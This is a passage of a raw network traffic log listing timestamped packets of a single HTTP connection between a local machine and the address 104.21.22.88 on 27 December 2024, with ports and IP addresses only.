Dec 27, 2024 06:22:15.089134932 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.089195013 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.090013981 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.090137959 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.090198040 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.091034889 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.091139078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.091202021 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.091994047 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.092152119 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.092209101 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.092999935 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.093180895 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.093239069 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.093985081 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.094120979 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.094173908 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.094983101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.095107079 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.095179081 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.096036911 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.096194983 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.096259117 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.096988916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.097129107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.097188950 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.097986937 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.098114014 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.098174095 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.098980904 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.099106073 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.099167109 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.099946976 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.142718077 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.249315977 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.249468088 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.249538898 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.249744892 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.249862909 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.250767946 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.250818968 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.250890970 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.250957966 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.251756907 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.251872063 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.252017975 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.252754927 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.252861023 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.252924919 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.253751993 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.253842115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.253906012 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.254740953 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.254873991 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.254933119 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.255733013 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.255939960 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.255999088 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.256720066 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.256961107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.257026911 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.257718086 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.257838011 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.257900953 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.258704901 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.258830070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.259114981 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.259721994 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.259854078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.260163069 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.260696888 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.260816097 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.260989904 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.261682034 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.261797905 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.261857986 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.262706995 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.262794971 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.262895107 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.263699055 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.263813972 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.263879061 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.264692068 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.264822006 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.264897108 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.265686035 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.265808105 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.265885115 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.266676903 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.266788006 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.266884089 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.267678022 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.267815113 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.267874002 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.268656969 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.268775940 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.268842936 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.269653082 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.269812107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.269876957 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.270648003 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.270766020 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.270832062 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.271650076 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.271780014 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.271841049 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.272634029 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.272780895 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.272840023 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.273650885 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.273780107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.273853064 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.274636030 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.274758101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.274902105 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.275649071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.275789022 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.275849104 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.276643991 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.276743889 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.276804924 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.277636051 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.277724028 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.277801991 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.278642893 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.278713942 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.278770924 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.279601097 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.279711008 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.279777050 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.280611038 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.280795097 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.280853033 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.281599998 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.281717062 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.281786919 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.282617092 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.282782078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.282836914 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.283577919 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.283698082 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.283756018 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.284579992 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.284698963 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.284759998 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.285589933 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.285686970 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.285746098 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.286570072 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.286672115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.286727905 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.287559986 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.287717104 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.287771940 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.288578033 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.288676023 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.288733959 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.289551973 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.289670944 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.289858103 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.290574074 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.290689945 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.290745020 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.291577101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.291690111 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.291778088 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.292563915 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.292676926 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.292731047 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.293570995 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.293664932 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.293741941 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.294538975 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.294668913 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.294801950 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.295567989 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.295661926 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.295715094 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.296582937 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.296701908 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.296756029 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.297538042 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.297652960 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.297755003 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.298537970 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.298643112 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.298713923 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.299529076 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.299634933 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.299710035 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.300530910 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.300663948 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.300723076 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.301497936 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.345855951 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.819289923 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819329023 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819349051 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819396973 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.819505930 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819523096 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819547892 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819564104 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819578886 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.819608927 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.819816113 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819833040 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819861889 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819879055 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819883108 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.819886923 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819904089 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819920063 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819930077 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.819930077 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.819936991 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819952965 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.819956064 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.820002079 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.820569992 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820585966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820601940 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820617914 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820641041 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820643902 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.820657015 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820662022 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.820673943 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820689917 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820707083 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820708036 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.820723057 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820740938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820749044 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.820758104 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820769072 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.820782900 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.820806980 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.821512938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821528912 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821546078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821561098 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821567059 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.821568966 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821585894 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821602106 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821604013 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.821619987 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821624041 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.821635962 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821641922 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.821655035 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821671963 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821682930 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.821686983 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821705103 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.821722984 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.821809053 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.822465897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822508097 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822524071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822540998 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822556019 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822556973 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.822572947 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822590113 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822594881 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.822607040 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822623014 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822638035 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822644949 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.822644949 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.822655916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822671890 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822689056 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822701931 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.822706938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.822746992 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.822746992 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.823412895 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823429108 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823443890 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823466063 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823477030 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.823482037 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823498011 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823513031 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823514938 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.823528051 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823544025 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823544025 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.823559999 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823576927 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823580027 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.823594093 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823606014 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.823611021 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.823648930 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.824352026 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824373007 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824388981 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824408054 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824423075 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824430943 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.824438095 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824455023 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824457884 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.824470997 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824479103 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.824487925 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824500084 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.824505091 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824521065 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824537039 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824552059 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.824557066 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.824557066 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.824609041 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.825196981 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825225115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825239897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825256109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825269938 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825273037 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.825285912 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825290918 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.825303078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825328112 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825340986 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.825345039 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825361013 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825361013 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.825377941 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825392962 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825407982 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825416088 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.825423956 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:15.825433016 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.825469971 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:15.826201916 CET	80	49730	104.21.22.88	192.168.2.4
